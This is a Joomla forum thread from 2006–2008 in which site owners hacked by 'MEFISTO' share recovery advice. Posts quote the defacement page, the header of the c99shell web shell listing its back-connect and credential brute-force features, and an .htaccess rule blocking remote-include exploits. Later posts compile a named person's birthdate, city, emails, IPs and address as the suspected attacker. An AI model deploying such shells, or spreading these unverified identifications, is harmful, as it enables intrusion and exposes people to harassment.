The Joomla! Forum ™



Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  [ 19 posts ] 
Author Message
 Post subject: Hacked by MEFISTO
PostPosted: Wed Jul 26, 2006 4:46 am 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Mon Sep 26, 2005 4:37 am
Posts: 67
Location: Denver
Well, looks like I stepped away from my site for about a month and got hacked. I guess I'm posting because I'm hoping if someone looks at the page they can see the errors and maybe give a little hand.

I can't give much info, but can investigate. I had joomla 1.0.9 and had several components. I am not a master joomla user like some of the other threads I read about this. I'm just posting hoping it might get some questions that I can try and investigate and answer.

Here's my site, just happened in the last couple of days. I haven't checked in about a week.

http://www.prettymess.net/main/

Man, I really put a lot of work into this site and it was just about my recording studio. I guess I was naive to believe that I was not going to be targeted by someone with too much time on their hands. My mistake.

(I'm sure you can probably sense the defeat in my post, this really bums me out)

_________________
If you heard that...you should be the engineer!
http://www.prettymess.net


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Wed Jul 26, 2006 5:48 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17321
Location: **Translation Matters**
1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will cerainly pinpoint there the target of the hacker.

Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla  (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Thu Jul 27, 2006 2:37 pm 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Mon Sep 26, 2005 4:37 am
Posts: 67
Location: Denver
Ext Cal, Joombook, and joomlaxplorer, I believe.

I do recall a little trouble with my ext cal first.

_________________
If you heard that...you should be the engineer!
http://www.prettymess.net


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Thu Jul 27, 2006 4:20 pm 
User avatar
Joomla! Explorer
Joomla! Explorer

Joined: Sat Sep 03, 2005 1:56 am
Posts: 334
Location: Upstate New York
infograf768 wrote:
1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will cerainly pinpoint there the target of the hacker.

Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla  (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).


Not just reinstalling though.. make sure to REMOVE everything first.. or go through each directory and clean it.. I had at least a hundred malicious script files interspersed in my joomla folders AND the htaccess files were all hacked too..

_________________
Thanks!
Aaron


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Thu Jul 27, 2006 4:31 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17321
Location: **Translation Matters**
crash777 wrote:
infograf768 wrote:
1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig", you will cerainly pinpoint there the target of the hacker.

Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla  (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).


Not just reinstalling though.. make sure to REMOVE everything first.. or go through each directory and clean it.. I had at least a hundred malicious script files interspersed in my joomla folders AND the htaccess files were all hacked too..


Right.  ;)

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Thu Jul 27, 2006 4:58 pm 
Joomla! Hero
Joomla! Hero

Joined: Sun Aug 28, 2005 5:03 pm
Posts: 2447
I believe there is an update for extcal available (forget where I read that...)


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Fri Jul 28, 2006 1:28 am 
User avatar
Joomla! Guru
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
That announcement about the security update for ExtCalendar and links to download are here: http://forum.joomla.org/index.php/topic ... #msg402249

@jproducer - check your files via ftp to see the dates on which they were changed. Since you have been away it should be easy to spot files that were created or modified in the period you weren't doing any work on the site. In most cases, these crackers have not touched the database - a quick check through using phpMyAdmin or whatever you use for database management will tell you if your data has been compromised.  If its ok, the best thing to do would be to backup your database, backup your template folder to your PC (and check files carefully for any changes), then delete all files and do a clean install of Joomla 1.0.10.  If your template is fine its then just a matter of adding that back in and importing your database.

Before adding back any extensions, check the 3PD security forum to make sure you dont install something known to be insecure.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Fri Jul 28, 2006 3:38 am 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Mon Sep 26, 2005 4:37 am
Posts: 67
Location: Denver
Okay, my web provider has blocked my site and given me just ftp access. Now, they said that my mysql database wasn't wrecked. Is it possible to back up my database, install joomla fresh, then put back the database to save what I had?

I know this is a newbie question, but is it possible?

_________________
If you heard that...you should be the engineer!
http://www.prettymess.net


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Fri Jul 28, 2006 3:40 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 12:38 am
Posts: 13388
Location: Sydney - Australia
jproducer wrote:
Okay, my web provider has blocked my site and given me just ftp access. Now, they said that my mysql database wasn't wrecked. Is it possible to back up my database, install joomla fresh, then put back the database to save what I had?

I know this is a newbie question, but is it possible?


Yip. Just remove and replace your Joomla files. You will loose any non-core components/modules etc etc though. You might want to ensure you know how to configure your configuration.php file though... once new files are in place, setup configuration.php to connect to database and you should be good to go.

_________________
Brad Baker - Follow me on Google+
http://www.rochen.com - Joomla! Hosting, the correct way.
http://www.joomlatutorials.com <-- Joomla Help & Tutorials
^Now with Joomla 2.5 and Joomla 3.0 Tutorials


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Sat Jul 29, 2006 5:58 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Sat Jul 29, 2006 2:33 pm
Posts: 1
I'm another victim of this pirate called MEFISTO. My website was "defaced" using the c99shell script. The attack apparently is related to com_securityimages component.

During the minutes prior to my web site being highjacked by this [EDit by mod: watch your language. Using such terms will not help solve your problems] I found multiples requests of the form

Mod Edit: Please don't paste log files to the forums.  Thank you. -RobS

To my surprise, this URL gives access to perform all kind of operations on the filesystem. MEFISTO then proceeded to overwriting the "configuration.php" with a simple HTML page.

I have now the following in my .htaccess for protection:

Quote:
RewriteCond %{QUERY_STRING} .*mosConfig_absolute_path.*
RewriteRule .* - [F,L]


which will give a HTTP 403 error on any subsequent attempt to exploit the bug. This is admitedly not a permanent solution.


Last edited by infograf768 on Sun Jul 30, 2006 5:41 am, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Aug 07, 2006 5:45 pm 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Sun Apr 09, 2006 4:01 pm
Posts: 60
my site:

/index.php:
Code:
<html>
<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>HaCKed By MEFISTO</title>
</head>

<body bgcolor="#000000" text="#808080">

<p align="center"> </p>
<p align="center"> </p>
<p align="center">
<img src="http://img301.imageshack.us/img301/6885/takeittuxlo5.jpg"

width="200" height="300"></p>
<p align="center"> </p>

<p align="center"><font size="6"> HACKED By MEFISTO </font></p>
<p align="center"><font size="5">it's Not Hack..it's ******** BabE </font></p>
<p align="center"><font size="5">MefistoFales@HotmaiL.COM</font></p>
<p align="center"><font size="5">ThanKs All My Friends..</font></p>
<p align="center"><font size="5">HACKED</font></p>



i find:

"/" added c99.php
"/components/com_jd-wiki/lib/tpl/default/" added .thumbs.php


in .thumbs.php:

Code:
<?php
/*
******************************************************************************************************
*
*               c99shell.php v.1.0 pre-release build #16
*                     Freeware license.
*                         [removed].
*  c99shell - r-ellcld ldl www-dld.
*  u eclnl lndrn nerrn dnltt ldnct r errl nndrcel ddenr:
   http://[removed].ru/releases/c99shell
*
*  WEB: http://[removed].ru
*  ICQ UIN #: 656555
*
*  nlnnc:
*  + ddrlcl eruec c rluec (ftp, samba) rrec/drderec, ndncder
*    rercrcl nercrcl r c drde
*    (ddldcnl dreurlnn?/drndreurlnn? ldl tar)
*    ddcnu dcne (ecl ndc r)
*    modify-time c access-time  r l el?tnn? ddc dlrencdrcc (? ne. ne $filestealth)
*  + udlcl ddca PHP-er
*  + ecduce ruo ldl md5, unix-md5, sha1, crc32, base64
*  + unndu eru rrc ldrnnnc N
*  + unndl ftp-nercdrcl r n?ec login;login c /etc/passwd (u rln nnd e 1/100 reern)
*    dnndrcu u, ndncder, adddul dldrcc r /nrcrec, ddrlcl ddlnnrec SQL)
*  + nedcdn "tcn" include: rnernclnec culn dldlelul n lnedcdndrec c nnr?ln co  nnuec (dcr)
     nrecl ec celcn $surl (rr? nnuer) ere ldl ecadrct (ddccnl) nre c ldl cookie "c99sh_surl",
     cln rn-rdcn rlc? $set_surl  cookie "set_surl"
*  + ecnn "rccn" /bin/bash r ddlllu ddn n ddcue drdle,
*    cc nlrn back connect (ddccnn? nlnncdrcl nlllc?, c u?nn? drdrelndu ? rdner NetCat).
*  + ecnn unnda nre-rlc? nedcdnr
*  + rnernccdrr? nddrer nulc  ldrnero c dclrc?o rnd (ldl mail())
.
.
.
.


in c99.php:

Code:
*               c99shell.php v.1.0 beta


my site log in Attach:
[removed by moderator=--NEVER post vulneratble logs!]

_________________
### Joomla! AutoIt! ###
Joomla! 中文交流平台  [Chinese GMT +8] http://www.autoit.cn


Last edited by nathandiehl on Mon Aug 07, 2006 6:08 pm, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Aug 07, 2006 7:12 pm 
Joomla! Guru
Joomla! Guru

Joined: Sat Sep 10, 2005 10:31 pm
Posts: 842
jd-wiki has been updated:
http://forge.joomla.org/sf/frs/do/viewR ... components

joomla_com_jd-wiki_v1.0.3:
http://forge.joomla.org/sf/frs/do/downl ... s6415?dl=1

You only need to update the template files though:
http://forum.joomla.org/index.php?topic=83724.new#new

_________________
We may not be able to control the wind, but we can always adjust our sails


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Aug 07, 2006 7:14 pm 
User avatar
Joomla! Ace
Joomla! Ace

Joined: Wed Aug 17, 2005 10:12 pm
Posts: 1827
Location: Germany-Bad Abbach
There is no need to install the new version completly only unzip and replace the templates default and nucleus in /componets/com_jd-wiki/lib/tpl thats it if you only want to update.

If you have Register Global Off you are secure but to be sure also update the templates, the Remote Include Vulnerablility works only with RG = On.

_________________
The "Humor, Fun and Games" forum has  more than 2500 Posts, so why not build a "Humor, Fun and Games Working" Group?
.....
Malicious tongues say we have this WG right from the start, they call it core team :D


Last edited by Predator on Mon Aug 07, 2006 7:24 pm, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Aug 07, 2006 7:21 pm 
User avatar
Joomla! Intern
Joomla! Intern

Joined: Sun Apr 09, 2006 4:01 pm
Posts: 60
;) thank all!

_________________
### Joomla! AutoIt! ###
Joomla! 中文交流平台  [Chinese GMT +8] http://www.autoit.cn


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Aug 14, 2006 2:40 pm 
User avatar
Joomla! Fledgling
Joomla! Fledgling

Joined: Sun Sep 04, 2005 7:43 am
Posts: 4
Location: Kampala, Uganda
Just a bit of googling:

mefistofales@hotmail.com brings you a lot of sites that have been hacked by this ingenious fellow. But no info. Although there is a lot of Turkish around these pages, somehow...

Doing a search for mefistofales brings up more interesting stuff, amonst wich 3 profiles, one in chech, one in romania and this one, in turkish:

http://www.blogcu.com/mefistofales

how many people would use this nickname and speak turkish?

There is an email address: yardimciel@gmail.com And a profile page:

http://www.blogcu.com/mefistofales/profile/

with this info:

Blog: ve ve ve
her şeyi bulabileceğiniz bir yer olma umuduyla

• Ad Soyad: selcuk yardimciel
• Cinsiyet: Erkek
• Doğum Tarihi: Kasım 12, 1983 (Yaş: 22)
• Yer: ankara, Turkiye
• Blog Kategorisi: Diğer

Yazdığım Yazılar: 0 kayıt
Yazdığım Yorumlar: 0 yorum
Alınan Yorumlar: 0 yorum
Kayıt Tarihi: 10 Mayıs 2006
Son Giriş: 19 Mayıs 2006

Is there anyone who reads turkish? For example, what does Diger stand for?

The attack on my server, was performed using a script hosted under a yahoo account called sikat_pl. You can see the code here: http://geocities.com/sikat_pl/nenen.txt
Sikat btw seems to be a philipino word if you google for it.

The IP adress from where the attack was staged was 125.160.81.175. I cant trace that address, even with http://www.ripe.net, my ISP does not allow me to do traceroutes either.

The second hacker btw was By_CrueLKurt@hotmail.com, and he also seems to master the turkish language. I think he just started, because google does not reveal a lot of information about this fellow.

Do other people have similar logs?

BTW, this post blocked the attack: http://forum.joomla.org/index.php/topic,75376.0.html

I just went into the backend of my website. I have a statistics component running. and guess what? It shows the last visitor! And guess what? He is from Turkey! And guess what? He has an ADSL modem. It's happily located at

dsl.static8510111679.ttnet.net.tr

If you were also hacked by this Mefisto guy, you can send an email to his provider at musteridestek@ttnet.net.tr, asking for the guys name and address so that you can file a lawsuit against him. Given the fact that he seems to be relatively active, and Turkey really wants to show it is ready to join the EU, is expect they will answer positively to this request.

_________________
OpenSource from Africa
http://www.mountbatten.net


Last edited by batje on Mon Aug 14, 2006 3:03 pm, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Tue Aug 15, 2006 12:00 pm 
User avatar
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Feb 16, 2006 9:40 pm
Posts: 31
Location: Detroit, MI
Yeah, there has to be some sort of security hole in joomla. I am on the latest 1.0.10 and 3 of my sites were hit.

Only the index.php was rewritten on each site(atleast all I could find)

Might be something to look into. I have not been able to find any c99.php script.. Only components are

joomlaxplorer(latest version)
my comment(this was installed the day it was hacked(latest version)
community builder(updated a week ago after the new security release)

Hope this helps you figure it out.

_________________
~Chilifrei64
http://www.chilifrei.net
http://www.lazynetworkadmin.com


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Sep 10, 2007 2:17 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Mon Sep 10, 2007 2:11 pm
Posts: 1
Whoever this Mefisto is, he's nothing but a low-life hacker wannabe, any real hacker with any shred of dignity wouldn't stoop to something as low as trashing your website..

_________________
Find your dryer parts the easy way...


Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Sep 10, 2007 3:35 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Nov 23, 2006 7:52 pm
Posts: 42
There are the details of this hackers website: http://WWW.ROOTHACKER.ORG and

His e-mail is: Mefisto@HackerMaiL.Com

Domain ID: D122651965-LROR
Domain Name: ROOTHACKER.ORG
Created On: 18-May-2006 21:19:50 UTC
Last Updated On: 21-Aug-2007 21:57:20 UTC
Expiration Date: 18-May-2008 21:19:50 UTC
Sponsoring Registrar: Directi Internet Solutions d/b/a PublicDomainRegistry.Com
(R27-LROR)
Status:OK
Registrant ID: DI_4725324
Registrant Name: Neo Anderson
Registrant Organization: A.S
Registrant Street1: Kadikoy iskele caddesi no:12
Registrant Street2:
Registrant Street3:
Registrant City: kadikoy
Registrant State/Province: Istanbul
Registrant Postal Code: 06000
Registrant Country: TR
Registrant Phone: +212.5555555

The same info for Admin and Technical contact.

His name is probably false [ref: Matrix] , but you never know. The address seems a legit personal home address.

The IP for these nameservers is: 80.93.221.97

The name servers are:
ROOT.ROOTHACKER.ORG
DAMAR.ROOTHACKER.ORG

Address DN                      Type    Value
97.221.93.80.in-addr.arpa  name    host-80-93-221-97.teklan.com.tr 

He has had 22 unique nameserver changes for this domain within the last year.


Other domian associations: hackturkiye.net as well as hackyurkiya.com


As his website contains illegal material, his illegal activity is atrributable with a Google search and he seems to be hosting the site at home I'd complain to Domain Name Regsitrar of .org domains and complain to the registering agent: Directi Internet Solutions, who are based in the USA, requesting deletion of the domain name.


Last edited by Nibblers on Mon Sep 10, 2007 3:54 pm, edited 1 time in total.

Top
 Profile  
 
 Post subject: Re: Hacked by MEFISTO
PostPosted: Thu Aug 28, 2008 12:17 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Nov 23, 2006 7:52 pm
Posts: 42
Some news - this person was behind the organisation many joomla hackers came from including MEFISTO...

http://thebellwetherdaily.[URL banned].com/2008/03/fbi-probing-ohio-based-computer-hacker.html

Sunday, March 02, 2008
FBI Probing Ohio-based Computer Hacker: European Webhost Targeted From Cincinnati Surburb?

CINCINNATI (TDB) -- The FBI's computer crimes squad is on the trail of an Ohio hacker suspected of defacing Internet sites that use a company in Finland, Scene Group Oy, as their webhost. One of the targeted 'net sites reportedly was BahiaNetStore.com, which markets Brazilian-themed women's apparel. A federal magistrate authorized a search warrant last week for a Butler County home near Cincinnati where the hacker may have operated under the online screen name, or hacker tag, "Evilthoutz." No charges have been filed.

Scene Group is a private firm based in Pori, a city of more than 100,000 residents that is the 10th largest in Finland. A company official, Mikko Kivinen, is identified in a federal court affidavit obtained by The Daily Bellwether as first reporting the hacking incidents last November 28. Kivinen later traced the suspected hacker to an online bulletin board and a page on MySpace. Kivinen told the FBI his company was a target:

"Kivinen also stated that Evilthoutz was successful in hacking into the company's server and forwarding several e-mails to the e-mail address *****. During the hack, Evilthoutz tried to change the root password of the server and was unsuccessful. Evilthoutz then called the company hosting the servers, located in Texas, in an attempt to socially engineer the root password. Again, Evilthoutz was unsuccessful in changing the root password. Kivinen noted that the last website defacement occurred on December 27, 2007. Kivinen had no idea why Evilthoutz targeted his company."

The FBI said a confidential informant has contacted the suspected hacker online and discussed website defacements. Other records about Evilthoutz were subpoenaed from Microsoft and Cincinnati Bell, which operates a highspeed Internet service called Zoomtown.


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 19 posts ] 



Who is online

Users browsing this forum: No registered users and 11 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group